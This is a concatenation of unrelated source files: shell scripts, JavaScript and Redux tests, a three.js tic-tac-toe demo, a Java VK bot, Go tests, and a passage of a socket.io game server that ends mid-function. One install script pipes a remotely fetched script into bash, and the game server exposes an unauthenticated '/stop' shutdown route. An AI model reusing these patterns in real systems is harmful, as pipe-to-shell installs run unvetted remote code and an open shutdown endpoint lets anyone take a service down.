# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
set -o nounset
set -o errexit
set -o pipefail

# Print an informational message.
function info {
    _print_msg "INFO" "$1"
}

# Print an error message and abort the script.
function error {
    _print_msg "ERROR" "$1"
    exit 1
}

function _print_msg {
    echo "$1: $2"
}

info "Validating skopeo installation..."
# Redirect command -v so the resolved binary path isn't printed on success.
if ! command -v skopeo >/dev/null 2>&1; then
    error "skopeo command line wasn't installed"
fi
|
//
// Created by ooooo on 2019/12/5.
//
#ifndef CPP_0338_SOLUTION1_H
#define CPP_0338_SOLUTION1_H
#include <iostream>
#include <vector>
using namespace std;
class Solution {
public:
    /**
     * Returns a vector v of size num+1 where v[i] is the number of set bits
     * in i (LeetCode 338 "Counting Bits").
     *
     * DP over bit structure: i >> 1 has the same bits as i except the lowest
     * one, so popcount(i) = popcount(i >> 1) + (i & 1). This is O(num) total
     * instead of the original per-number Kernighan loop (O(num * bits)).
     */
    std::vector<int> countBits(int num) {
        std::vector<int> res(num + 1, 0);
        for (int i = 1; i <= num; ++i) {
            res[i] = res[i >> 1] + (i & 1);
        }
        return res;
    }
};
#endif //CPP_0338_SOLUTION1_H
|
<filename>frontend/src/actions/events-search.spec.js
import 'babel-polyfill'
import Mappersmith from 'mappersmith'
import 'mappersmith/fixtures'
import configureMockStore from 'redux-mock-store'
import thunk from 'redux-thunk'
import { EVENTS_SEARCH_LIMIT } from 'api'
const middlewares = [ thunk ]
const mockStore = configureMockStore(middlewares)
import {
TRIGGER_EVENTS_SEARCH,
REQUEST_EVENTS_SEARCH_RESULTS,
RECEIVE_EVENTS_SEARCH_RESULTS,
REQUEST_EVENTS_SEARCH_RESULTS_FAILED,
ADD_FLASH_MESSAGE,
LOAD_MORE_EVENTS_SEARCH_RESULTS
} from 'actions'
import {
triggerSearch,
fetchSearchResults,
loadMoreSearchResults
} from 'actions/events-search'
// Reset the Mappersmith HTTP fixtures between tests so definitions don't leak.
beforeEach(() => {
  Mappersmith.Env.Fixture.clear()
})
describe('actions/event-search', () => {
  describe('#fetchSearchResults', () => {
    describe('without filters', () => {
      let event, initialState, store
      beforeEach(() => {
        initialState = { eventsFilters: {}, xhrStatus: { currentEventsOffset: 0 } }
        store = mockStore(initialState)
        event = { id: 1 }
        // Stub the events endpoint to return a single event.
        Mappersmith.Env.Fixture
          .define('get')
          .matching({ url: `/api/v1/events?limit=${EVENTS_SEARCH_LIMIT}&offset=0` })
          .response([event])
      })
      it('creates REQUEST and RECEIVE actions', (done) => {
        store.dispatch(fetchSearchResults(event)).then(() => {
          const actions = store.getActions()
          expect(actions[0]).toEqual({ type: REQUEST_EVENTS_SEARCH_RESULTS })
          expect(actions[1]).toEqual({ type: RECEIVE_EVENTS_SEARCH_RESULTS, events: [event], offset: 0 })
          done()
        })
        .catch((e) => done.fail(`test failed with promise error: ${e.message}`))
      })
    })
    describe('with specific filters', () => {
      let event, initialState, store
      beforeEach(() => {
        // eventsFilters should be serialized into the request query string.
        initialState = {
          eventsFilters: { type: 'event_type', value: 'new' },
          xhrStatus: { currentEventsOffset: 0 }
        }
        store = mockStore(initialState)
        event = { id: 1 }
        Mappersmith.Env.Fixture
          .define('get')
          .matching({ url: `/api/v1/events?limit=${EVENTS_SEARCH_LIMIT}&event_type=new&offset=0` })
          .response([event])
      })
      it('creates REQUEST and RECEIVE actions using the filters', (done) => {
        store.dispatch(fetchSearchResults(event)).then(() => {
          const actions = store.getActions()
          expect(actions[0]).toEqual({ type: REQUEST_EVENTS_SEARCH_RESULTS })
          expect(actions[1]).toEqual({ type: RECEIVE_EVENTS_SEARCH_RESULTS, events: [event], offset: 0 })
          done()
        })
        .catch((e) => done.fail(`test failed with promise error: ${e.message}`))
      })
    })
    describe('with a different offset', () => {
      let event, initialState, store
      beforeEach(() => {
        // currentEventsOffset from the store should drive the offset param.
        initialState = {
          eventsFilters: { },
          xhrStatus: { currentEventsOffset: 4 }
        }
        store = mockStore(initialState)
        event = { id: 1 }
        Mappersmith.Env.Fixture
          .define('get')
          .matching({ url: `/api/v1/events?limit=${EVENTS_SEARCH_LIMIT}&offset=4` })
          .response([event])
      })
      it('creates REQUEST and RECEIVE actions pointing to the correct offset', (done) => {
        store.dispatch(fetchSearchResults(event)).then(() => {
          const actions = store.getActions()
          expect(actions[0]).toEqual({ type: REQUEST_EVENTS_SEARCH_RESULTS })
          expect(actions[1]).toEqual({ type: RECEIVE_EVENTS_SEARCH_RESULTS, events: [event], offset: 4 })
          done()
        })
        .catch((e) => done.fail(`test failed with promise error: ${e.message}`))
      })
    })
    describe('when it fails', () => {
      let event, initialState, store
      beforeEach(() => {
        initialState = { eventsFilters: {}, xhrStatus: { currentEventsOffset: 0 } }
        store = mockStore(initialState)
        event = { id: 1 }
        // Stub a failing response; the action should surface the error
        // message via a flash message.
        Mappersmith.Env.Fixture
          .define('get')
          .matching({ url: `/api/v1/events?limit=${EVENTS_SEARCH_LIMIT}&offset=0` })
          .failure()
          .response({
            responseText: JSON.stringify({
              error: true,
              message: 'some error'
            })
          })
      })
      it('creates REQUEST and RECEIVE actions pointing to the correct offset', (done) => {
        store.dispatch(fetchSearchResults(event)).then(() => {
          const actions = store.getActions()
          expect(actions[0]).toEqual({ type: REQUEST_EVENTS_SEARCH_RESULTS })
          expect(actions[1]).toEqual({
            type: REQUEST_EVENTS_SEARCH_RESULTS_FAILED,
            query: { offset: 0 }, error: 'some error'
          })
          expect(actions[2]).toEqual({
            type: ADD_FLASH_MESSAGE,
            message: { id: jasmine.any(String), type: 'error', text: 'Events search failed. "some error"' }
          })
          done()
        })
        .catch((e) => done.fail(`test failed with promise error: ${e.message}`))
      })
    })
  })
  describe('#triggerSearch', () => {
    let event, initialState, store
    beforeEach(() => {
      initialState = {
        eventsFilters: {},
        xhrStatus: { currentEventsOffset: 0 }
      }
      store = mockStore(initialState)
      event = { id: 1 }
      Mappersmith.Env.Fixture
        .define('get')
        .matching({ url: `/api/v1/events?limit=${EVENTS_SEARCH_LIMIT}&offset=0` })
        .response([event])
    })
    it('creates TRIGGER_EVENTS_SEARCH and REQUEST actions', (done) => {
      store.dispatch(triggerSearch()).then(() => {
        const actions = store.getActions()
        expect(actions[0]).toEqual({ type: TRIGGER_EVENTS_SEARCH })
        expect(actions[1]).toEqual({ type: REQUEST_EVENTS_SEARCH_RESULTS })
        expect(actions[2]).toEqual({ type: RECEIVE_EVENTS_SEARCH_RESULTS, events: [event], offset: 0 })
        done()
      })
      .catch((e) => done.fail(`test failed with promise error: ${e.message}`))
    })
  })
  describe('#loadMoreSearchResults', () => {
    let event, initialState, store
    beforeEach(() => {
      initialState = {
        eventsFilters: {},
        xhrStatus: { currentEventsOffset: 4 }
      }
      store = mockStore(initialState)
      event = { id: 1 }
      Mappersmith.Env.Fixture
        .define('get')
        .matching({ url: `/api/v1/events?limit=${EVENTS_SEARCH_LIMIT}&offset=4` })
        .response([event])
    })
    it('creates LOAD_MORE_EVENTS_SEARCH_RESULTS and REQUEST actions', (done) => {
      store.dispatch(loadMoreSearchResults()).then(() => {
        const actions = store.getActions()
        // LOAD_MORE advances the offset by one page (EVENTS_SEARCH_LIMIT).
        expect(actions[0]).toEqual({ type: LOAD_MORE_EVENTS_SEARCH_RESULTS, offset: 4 + EVENTS_SEARCH_LIMIT })
        expect(actions[1]).toEqual({ type: REQUEST_EVENTS_SEARCH_RESULTS })
        expect(actions[2]).toEqual({ type: RECEIVE_EVENTS_SEARCH_RESULTS, events: [event], offset: 4 })
        done()
      })
      .catch((e) => done.fail(`test failed with promise error: ${e.message}`))
    })
  })
})
|
#!/bin/sh
# Remove the lcmtest output directory left over from a previous run, if any.
rm -rf lcmtest
|
import hashlib

# Compute the MD5 digest of a fixed message and print it as lowercase hex.
key = hashlib.md5(b"Hello World!")
print(key.hexdigest())
/*
* Copyright 2018 The boardgame.io Authors
*
* Use of this source code is governed by a MIT-style
* license that can be found in the LICENSE file or at
* https://opensource.org/licenses/MIT.
*/
import React from 'react';
import * as THREE from 'three';
import { Client } from 'boardgame.io/client';
import TicTacToe from '../tic-tac-toe/game';
import './main.css';
// Renders a boardgame.io TicTacToe game as a 3x3 grid of three.js cubes.
// Cubes are colored per player move; clicks are resolved via raycasting.
class App extends React.Component {
  state = {};
  constructor(props) {
    super(props);
    // Headless boardgame.io client holds the game state.
    this.client = Client({ game: TicTacToe });
    // Mirror the gameover flag into React state so render() can show it.
    this.client.subscribe(() => {
      const { ctx } = this.client.getState();
      if (ctx.gameover) {
        this.setState({ gameover: ctx.gameover });
      }
    });
    this.ref = null;
    this.scene = new THREE.Scene();
    this.renderer = new THREE.WebGLRenderer({ antialias: true });
    this.mouse = new THREE.Vector2();
    this.raycaster = new THREE.Raycaster();
    this.rotation = 0;
    this.cubes = [];
  }
  // Build camera, lights, and the 3x3 cube grid (cube i stores its cell
  // index in userData.i).
  createScene() {
    const scene = this.scene;
    scene.background = new THREE.Color(0xffffff);
    const camera = new THREE.PerspectiveCamera(
      45,
      window.innerWidth / window.innerHeight,
      0.1,
      1000
    );
    camera.position.z = 5;
    camera.position.x = 12;
    camera.position.y = 15;
    scene.add(camera);
    this.camera = camera;
    for (let i = 0; i < 9; i++) {
      const geometry = new THREE.BoxGeometry(1, 1, 1);
      const material = new THREE.MeshLambertMaterial({ color: 0xcccccc });
      const cube = new THREE.Mesh(geometry, material);
      const r = Math.floor(i / 3);
      const c = i % 3;
      cube.position.z = -c * 2;
      cube.position.x = r * 2;
      cube.userData.i = i;
      scene.add(cube);
      this.cubes.push(cube);
    }
    // Aim at the center cube of the grid.
    this.camera.lookAt(this.cubes[4].position);
    let light = new THREE.AmbientLight(0xffffff, 0.7);
    scene.add(light);
    light = new THREE.DirectionalLight(0x555555);
    scene.add(light);
  }
  // Per-frame loop: color claimed cells (red for player '0', green for '1'),
  // spin them, and redraw.
  animate = () => {
    requestAnimationFrame(this.animate);
    const { G } = this.client.getState();
    this.cubes.filter(c => G.cells[c.userData.i] == '0').forEach(c => {
      c.material.color.setHex(0xff0000);
      c.rotation.x = this.rotation;
    });
    this.cubes.filter(c => G.cells[c.userData.i] == '1').forEach(c => {
      c.material.color.setHex(0x00ff00);
      c.rotation.y = -this.rotation;
    });
    this.rotation += 0.03;
    this.renderer.render(this.scene, this.camera);
  };
  // Track the pointer in normalized device coords and highlight hovered cubes.
  onMouseMove = e => {
    const x = e.clientX - this.ref.offsetParent.offsetLeft;
    const y = e.clientY;
    this.mouse.x = x / window.innerWidth * 2 - 1;
    this.mouse.y = -(y / window.innerHeight) * 2 + 1;
    this.raycaster.setFromCamera(this.mouse, this.camera);
    const highlightedCubes = this.raycaster.intersectObjects(this.cubes);
    if (highlightedCubes.length > 0) {
      this.ref.style.cursor = 'pointer';
    } else {
      this.ref.style.cursor = '';
    }
    this.cubes.forEach(c => {
      c.userData.highlight = false;
      c.material.color.setHex(0xcccccc);
    });
    highlightedCubes.forEach(c => {
      c.object.material.color.setHex(0xaaaaaa);
    });
  };
  // On click, play the cell under the pointer via the game client.
  onMouseDown = () => {
    this.raycaster.setFromCamera(this.mouse, this.camera);
    this.raycaster.intersectObjects(this.cubes).forEach(cube => {
      this.client.moves.clickCell(cube.object.userData.i);
    });
  };
  componentDidMount() {
    this.renderer.setSize(window.innerWidth, window.innerHeight);
    this.ref.appendChild(this.renderer.domElement);
    this.createScene();
    this.animate();
  }
  render() {
    let text = '';
    if (this.state.gameover) {
      if (this.state.gameover.draw) text = 'draw';
      if (this.state.gameover.winner == '0') text = 'winner: red';
      if (this.state.gameover.winner == '1') text = 'winner: green';
    }
    return (
      <div
        className="root"
        onMouseDown={this.onMouseDown}
        onMouseMove={this.onMouseMove}
        ref={e => (this.ref = e)}
      >
        <div className="text">{text}</div>
      </div>
    );
  }
}
// Route table exported for the example runner: mounts App at /threejs/main.
const routes = [
  {
    path: '/threejs/main',
    text: 'threejs',
    component: App,
  },
];
export default {
  routes,
};
|
#!/bin/bash -x
# Show host GPU status, then verify GPU passthrough works inside Docker.
nvidia-smi
echo "-------------------- running as Docker to test also: -----------"
# -pm 1 enables GPU persistence mode (requires root).
sudo -i nvidia-smi -pm 1
sudo docker run --rm --gpus all nvidia/cuda:11.0-base nvidia-smi
|
<filename>src/main/java/w/bot/longpoll/SimpleVkBotLongPoll.java
/*
* Copyright 2022 Whilein
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package w.bot.longpoll;
import lombok.AccessLevel;
import lombok.Getter;
import lombok.RequiredArgsConstructor;
import lombok.experimental.FieldDefaults;
import lombok.experimental.NonFinal;
import lombok.extern.log4j.Log4j2;
import lombok.val;
import org.jetbrains.annotations.NotNull;
import w.bot.VkBot;
import w.bot.VkBotConfig;
import w.bot.longpoll.event.VkChatInviteUserEvent;
import w.bot.longpoll.event.VkChatKickUserEvent;
import w.bot.longpoll.event.VkMessageEvent;
import w.bot.type.Message;
import java.net.URI;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
/**
* @author whilein
*/
@Getter
@Log4j2
@FieldDefaults(level = AccessLevel.PRIVATE, makeFinal = true)
@RequiredArgsConstructor(access = AccessLevel.PRIVATE)
public final class SimpleVkBotLongPoll implements VkBotLongPoll {
private static final String URL = "%s?act=a_check&key=%s&ts=%s&wait=90";
VkBot vkBot;
int groupId;
@NonFinal
URI uri;
@NonFinal
String server, key, ts;
public static @NotNull VkBotLongPoll create(final @NotNull VkBot bot,
final @NotNull VkBotConfig.LongPoll config) {
return new SimpleVkBotLongPoll(bot, config.getGroupId());
}
private void _updateServer() {
val result = vkBot.groupsGetLongPollServer()
.groupId(groupId)
.make()
.call();
server = result.getServer();
key = result.getKey();
ts = result.getTs();
_updateUri();
}
private void _updateUri() {
this.uri = URI.create(URL.formatted(
server,
key,
ts
));
}
@Override
public void start() {
_updateServer();
while (true) {
try {
val request = HttpRequest.newBuilder()
.uri(uri)
.build();
val response = vkBot.getHttpClient()
.send(request, HttpResponse.BodyHandlers.ofByteArray());
val json = vkBot.getConfigProvider().parse(response.body());
val error = json.getInt("failed", 0);
switch (error) {
case 0 -> {
ts = json.getString("ts");
_updateUri();
for (val update : json.getObjectList("updates")) {
val type = update.getString("type", "");
switch (type) {
case "message_new" -> {
val message = update.findObject("object")
.map(object -> object.getAs("message", Message.class))
.orElseThrow();
val action = message.getAction();
if (action != null) {
switch (action.getType()) {
case "chat_invite_user" -> {
assert action.getMemberId() != null;
vkBot.dispatch(new VkChatInviteUserEvent(vkBot, message,
action.getMemberId(), action.getEmail()));
}
case "chat_kick_user" -> {
assert action.getMemberId() != null;
vkBot.dispatch(new VkChatKickUserEvent(vkBot, message,
action.getMemberId(), action.getEmail()));
}
}
} else {
vkBot.dispatch(new VkMessageEvent(vkBot, message));
}
}
// todo make another events
}
}
}
case 1 -> {
ts = String.valueOf(json.getInt("ts"));
log.debug("[LP] Получен failed 1: ts был обновлён на {}", ts);
_updateUri();
}
case 2, 3 -> {
log.debug("[LP] Получен failed {}: запрашиваем новый сервер и ключ", error);
_updateServer();
}
}
} catch (final Exception e) {
e.printStackTrace();
}
}
}
}
|
import ReactDOM from 'react-dom';
import App from '../app';
import React from 'react';
jest.mock('react-dom');
describe('index', () => {
  it('initialises the react App', () => {
    // Stub getElementById so the module under test receives a sentinel value
    // instead of a real DOM node; ReactDOM is already mocked above.
    document.getElementById = jest.fn();
    (document.getElementById as jest.Mock).mockReturnValue(
      'test getElementById'
    );
    // Importing index executes its top-level ReactDOM.render(...) call.
    require('../index');
    expect(ReactDOM.render).toHaveBeenCalledWith(
      <App />,
      'test getElementById'
    );
    expect(document.getElementById).toHaveBeenCalledWith('root');
  });
});
|
#!/usr/bin/env bash
# Copyright (c) 2017 ZipRecruiter
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Enable verbose debug logging for the proxy under test.
export DEBUG=chromedriver_proxy:*
# Free port 8080 in case a previous fixture server is still running.
fuser -k 8080/tcp
# Start the fixture server in the background, run the mocha suite, then free the port again.
(node fixtures/run_server.js &) && mocha --exit --timeout 10000 && fuser -k 8080/tcp
|
package com.outjected.email;
import java.io.IOException;
import java.util.UUID;
import javax.mail.internet.AddressException;
import javax.mail.internet.InternetAddress;
import javax.xml.bind.JAXBException;
import org.junit.Assert;
import org.junit.Test;
import com.google.common.io.Resources;
import com.outjected.email.api.ContentDisposition;
import com.outjected.email.api.EmailMessage;
import com.outjected.email.api.Header;
import com.outjected.email.api.MessagePriority;
import com.outjected.email.impl.attachments.BaseAttachment;
import com.outjected.email.util.XMLUtil;
/**
 * Round-trip test: marshals an {@link EmailMessage} to XML and back, then
 * verifies every field survives the trip.
 */
public class XMLTests {

    @Test
    public void simple() throws AddressException, JAXBException, IOException {
        EmailMessage msg = new EmailMessage();
        msg.setMessageId(UUID.randomUUID().toString() + "@test.org");
        msg.setImportance(MessagePriority.HIGH);
        msg.getFromAddresses().add(new InternetAddress("<EMAIL>", "Mr. From"));
        msg.getToAddresses().add(new InternetAddress("<EMAIL>"));
        msg.getCcAddresses().add(new InternetAddress("<EMAIL>"));
        msg.getBccAddresses().add(new InternetAddress("<EMAIL>"));
        msg.setSubject("subject");
        msg.setTextBody("text body");
        msg.setHtmlBody("html body");
        msg.addAttachment(new BaseAttachment("myfile.txt", "text/plain", ContentDisposition.ATTACHMENT, Resources.toByteArray(Resources.getResource("template.text.velocity"))));
        msg.addAttachment(new BaseAttachment("myfile2.txt", "text/plain", ContentDisposition.ATTACHMENT, Resources.toByteArray(Resources.getResource("template.text.velocity"))));
        msg.setEnvelopeFrom(new InternetAddress("<EMAIL>"));
        msg.getReplyToAddresses().add(new InternetAddress("<EMAIL>"));
        msg.getHeaders().add(new Header("Sender", "<EMAIL>"));
        msg.getHeaders().add(new Header("X-Sender", "<EMAIL>"));

        String xml = XMLUtil.marshal(msg);
        EmailMessage umsg = XMLUtil.unmarshal(EmailMessage.class, xml);

        // assertEquals instead of assertTrue(a.equals(b)): on failure it reports
        // both values instead of a bare "expected true", and it cannot NPE when
        // the unmarshalled side is null.
        Assert.assertEquals(msg.getType(), umsg.getType());
        Assert.assertEquals(msg.getCharset(), umsg.getCharset());
        Assert.assertEquals(msg.getImportance(), umsg.getImportance());
        Assert.assertEquals(msg.getToAddresses().get(0), umsg.getToAddresses().get(0));
        Assert.assertEquals(msg.getFromAddresses().get(0), umsg.getFromAddresses().get(0));
        Assert.assertEquals(msg.getCcAddresses().get(0), umsg.getCcAddresses().get(0));
        Assert.assertEquals(msg.getBccAddresses().get(0), umsg.getBccAddresses().get(0));
        Assert.assertEquals(msg.getSubject(), umsg.getSubject());
        Assert.assertEquals(msg.getTextBody(), umsg.getTextBody());
        Assert.assertEquals(msg.getHtmlBody(), umsg.getHtmlBody());
        Assert.assertEquals(msg.getMessageId(), umsg.getMessageId());
        Assert.assertEquals(msg.getAttachments().get(0).getFileName(), umsg.getAttachments().get(0).getFileName());
    }
}
|
<filename>src/main/java/de/core23/dicewars/misc/Game.java
package de.core23.dicewars.misc;
// Shared constants for the Dice Wars game.
// NOTE(review): interface fields are implicitly public static final, so the
// `final` modifiers below are redundant; also COLORS is an array whose
// *contents* remain mutable — callers could overwrite entries. Consider an
// immutable list, but changing the type would break existing callers.
public interface Game {
    // Player colors as 0xRRGGBB values, indexed by player number.
    final int[] COLORS = {0x2255FF, 0xCC4444, 0x44CC44, 0xAA22EE, 0xDDDD00, 0xFF8833, 0x777777, 0x55DDCC};
    final int DICE_START = 3;  // presumably dice per territory at game start — TODO confirm
    final int DICE_MAX = 8;    // presumably maximum dice a territory can hold — TODO confirm
    // Allowed player counts.
    final int PLAYER_MAX = 8;
    final int PLAYER_MIN = 2;
    // Board dimensions in blocks.
    final int NUM_BLOCK_X = 46;
    final int NUM_BLOCK_Y = 22;
}
|
# Echo commands as they run.
set -x
# Show the rollout revision history of the hello-deploy deployment.
kubectl rollout history deployment hello-deploy
|
<filename>build/types/utils/set_compare.d.ts
export declare function set_compare<T>(a: Set<T>, b: Set<T>): boolean;
|
#!/usr/bin/env bash
# Install Gruntwrok Installer
# See https://github.com/gruntwork-io/gruntwork-installer
# Install after Golang installation
# For colors, see https://stackoverflow.com/questions/5947742/how-to-change-the-output-color-of-echo-in-linux
RED='\033[0;31m'
YELLOW='\033[1;33m'
GREEN='\033[0;32m'
GRAY='\033[1;30m'
NC='\033[0m' # No Color
echo -e "\n${RED}Running installation of Gruntwork Installer and Terratest...${NC}\n"
# Run get_latest_release.sh (sourced so get_latest_release is available below)
. ./get_latest_release.sh
# Save current directory
CURRENT_DIR=$(pwd)
cd ~ || exit
# Set version to download
GRUNTWORK_INSTALLER_VERSION=$(get_latest_release "gruntwork-io/gruntwork-installer")
TERRATEST_VERSION=$(get_latest_release "gruntwork-io/terratest")
# Bootstrap the gruntwork installer, then use it to fetch terratest_log_parser.
curl -LsS https://raw.githubusercontent.com/gruntwork-io/gruntwork-installer/master/bootstrap-gruntwork-installer.sh | bash /dev/stdin --version "${GRUNTWORK_INSTALLER_VERSION}"
gruntwork-install --binary-name 'terratest_log_parser' --repo 'https://github.com/gruntwork-io/terratest' --tag "${TERRATEST_VERSION}"
# Set back to the original current directory
cd "$CURRENT_DIR" || exit
echo -e "${GREEN}Gruntwork Installer and Terratest installation complete.${NC}\n"
|
<reponame>arp242/zstd<filename>zbyte/zbyte_test.go
package zbyte
import (
"testing"
)
// TestBinary checks Binary's classification of byte slices as binary data:
// empty and valid-UTF-8 input is text; a NUL byte marks binary.
func TestBinary(t *testing.T) {
	cases := []struct {
		in   []byte
		want bool
	}{
		{[]byte(""), false},
		{[]byte("€"), false},
		{[]byte("helllo\x00"), true},
	}

	for _, tc := range cases {
		t.Run("", func(t *testing.T) {
			if got := Binary(tc.in); got != tc.want {
				t.Errorf("want: %t; have: %t", tc.want, got)
			}
		})
	}
}
// TestElideLeft verifies ElideLeft keeps at most n bytes from the left.
func TestElideLeft(t *testing.T) {
	tests := []struct {
		in   []byte
		n    int
		want []byte
	}{
		{[]byte("abcdef"), 6, []byte("abcdef")},
		{[]byte("abcdef"), 2, []byte("ab")},
		{[]byte("abcdef"), 0, []byte("")},
	}
	for _, tt := range tests {
		t.Run("", func(t *testing.T) {
			have := ElideLeft(tt.in, tt.n)
			// Bug fix: previously compared have against itself
			// (string(have) != string(have)), which can never fail.
			if string(have) != string(tt.want) {
				t.Errorf("want: %s; have: %s", tt.want, have)
			}
		})
	}
}
// TestElideRight verifies ElideRight keeps at most n bytes from the right.
func TestElideRight(t *testing.T) {
	tests := []struct {
		in   []byte
		n    int
		want []byte
	}{
		{[]byte("abcdef"), 6, []byte("abcdef")},
		{[]byte("abcdef"), 2, []byte("ef")},
		{[]byte("abcdef"), 0, []byte("")},
	}
	for _, tt := range tests {
		t.Run("", func(t *testing.T) {
			have := ElideRight(tt.in, tt.n)
			// Bug fix: previously compared have against itself
			// (string(have) != string(have)), which can never fail.
			if string(have) != string(tt.want) {
				t.Errorf("want: %s; have: %s", tt.want, have)
			}
		})
	}
}
|
import express, { Application } from 'express';
import http from 'http';
import os from 'os';
import socketIo, { Server } from 'socket.io';
import {
SessionMessage,
SessionJoinMessage,
SessionLeaveMessage,
SessionDeleteMessage,
CardsUpdateMessage,
PlayersUpdateMessage,
ServerOptions,
GameSessionsPersistence,
} from './interfaces';
import {
PLAYER_START,
PLAYER_JOIN,
PLAYER_LEAVE,
CARDS_UPDATE,
PLAYERS_UPDATE,
GAME_SESSION_DELETE,
GAME_SESSIONS_UPDATE,
} from './game-events';
import {
CONNECTION,
CLOSE,
} from './io-events';
/**
* The game socket server receiving and sending game and connection events.
*/
export class GameServer {
  /**
   * Timeout reference for the game sessions send interval.
   */
  private timeout: NodeJS.Timeout;
  /**
   * The underlying (express) HTTP server.
   */
  private httpServer: http.Server;
  /**
   * The socket game server.
   */
  private io: Server;
  /**
   * Whether stopping game server at the moment.
   */
  private stopping: boolean;
  /**
   * Creates an instance of game server and starts it with the given options.
   * @param options - The game server options.
   */
  constructor(options: ServerOptions) {
    this.stopping = false;
    const expressApp: Application = express();
    this.httpServer = http.createServer(expressApp);
    this.io = socketIo(this.httpServer);
    this.initHttpServerRoutes(expressApp, options.port);
    this.timeout = this.initGameSessionsSendInterval(this.io, options);
    this.initSocketEventListeners(this.io, options);
    this.start(options.port);
  }
  /**
   * Handles event error (logging).
   * @param err - The error occurred.
   * @param event - The current event
   */
  private handleEventError(err: Error, event: string) {
    console.error(`SERVER: error caught on ${event}: ${err.stack}`);
  }
  /**
   * Inits the HTTP server routes.
   * @param app - The express application (HTTP server).
   * @param port - The port the server is listening.
   */
  private initHttpServerRoutes(app: Application, port: number) {
    // Landing page with a manual stop button.
    app.get('/', (req, res) => {
      res.send(`
        <h1>Memory Game Server listening on port ${port}...</h1>
        <button onclick="window.location.href='/stop'" type="button">Stop Server</button>
      `);
    });
    // Liveness probe.
    app.get('/ping', (req, res) => {
      console.log('SERVER: sending "pong"');
      res.send('pong');
    });
    // Graceful shutdown trigger; the page redirects back to / after 5s.
    app.get('/stop', (req, res) => {
      this.stop();
      this.stopping = true;
      res.send(`
        <script>
          window.onload = function() {
            setTimeout(function() {
              // similar behavior as clicking on a link
              window.location.href = "/";
            }, 5000);
          }
        </script>
        <h1>Stopping Memory Game Server...</h1>
      `);
    });
  }
  /**
   * Inits game sessions send interval for the socket server.
   * @param io - The socket server.
   * @param options - The server options.
   * @returns The itervall timeout object for later reference when closing server gracefully.
   */
  private initGameSessionsSendInterval(io: Server, options: ServerOptions) {
    return setInterval(() => {
      const sessions = options.gameSessionsPersistence.readAll();
      // console.log(`SERVER: emitting game sessions =>\n${JSON.stringify(sessions, null, 2)}`);
      io.emit(GAME_SESSIONS_UPDATE, sessions);
    }, options.gameSessionsUpdateSendInterval);
  }
  /**
   * Inits socket event listeners.
   * @param io - The socket server.
   * @param options - The server options.
   */
  private initSocketEventListeners(io: Server, options: ServerOptions) {
    const sessionsDB: GameSessionsPersistence = options.gameSessionsPersistence;
    io.on(CONNECTION, (socket) => {
      let previousId: string;
      // Join the right session.
      // Leaves the previously joined socket.io room before joining the new one,
      // so a socket is only ever in one session room at a time.
      const safeJoin = (currentId: string) => {
        socket.leave(previousId);
        socket.join(currentId);
        previousId = currentId;
      };
      // A player creates (and implicitly owns) a new session.
      socket.on(PLAYER_START, (session: SessionMessage) => {
        try {
          // console.log(`SERVER: on PLAYER_START =>\n${JSON.stringify(session, null, 2)}`);
          safeJoin(session.id);
          sessionsDB.create(session);
          io.emit(GAME_SESSIONS_UPDATE, sessionsDB.readAll());
          socket.emit(PLAYER_START, session);
          // socket.to(session.id).emit(PLAYER_START, session); // TODO is this really necessary?
        } catch (err) {
          this.handleEventError(err, PLAYER_START);
        }
      });
      // A player joins an existing session; the stored session is merged from
      // the persisted state and the incoming message.
      socket.on(PLAYER_JOIN, (session: SessionJoinMessage) => {
        try {
          // console.log(`SERVER: on PLAYER_JOIN =>\n${JSON.stringify(session, null, 2)}`);
          safeJoin(session.id);
          const currentSession = sessionsDB.read(session.id);
          sessionsDB.update(session.id, {
            id: session.id,
            name: currentSession.name,
            status: 'joined',
            sessionOwnerNetworkId: currentSession.sessionOwnerNetworkId,
            senderPlayerIndex: session.senderPlayerIndex,
            senderPlayerNetworkId: session.senderPlayerNetworkId,
            players: session.players,
            cards: currentSession.cards,
          });
          io.emit(GAME_SESSIONS_UPDATE, sessionsDB.readAll());
          socket.emit(PLAYER_JOIN, session);
          socket.to(session.id).emit(PLAYER_JOIN, session);
        } catch (err) {
          this.handleEventError(err, PLAYER_JOIN);
        }
      });
      // A player leaves; an empty session is deleted, otherwise the session
      // status is recomputed from the remaining player count.
      socket.on(PLAYER_LEAVE, (session: SessionLeaveMessage) => {
        try {
          // console.log(`SERVER: on PLAYER_LEAVE =>\n${JSON.stringify(session, null, 2)}`);
          let sessionToLeave;
          if (session.players.length === 0) {
            // console.log(`SERVER: on PLAYER_LEAVE => players count is 0 => delete sesssion:\n${JSON.stringify(session, null, 2)}`);
            sessionToLeave = sessionsDB.delete(session.id);
          } else {
            const currentSession = sessionsDB.read(session.id);
            sessionToLeave = sessionsDB.update(session.id, {
              id: session.id,
              name: currentSession.name,
              status: session.players.length === 1 ? 'open' : 'joined', // enables more than 2 players!
              sessionOwnerNetworkId: currentSession.sessionOwnerNetworkId,
              senderPlayerIndex: session.senderPlayerIndex,
              senderPlayerNetworkId: session.senderPlayerNetworkId,
              players: session.players,
              cards: currentSession.cards,
            });
          }
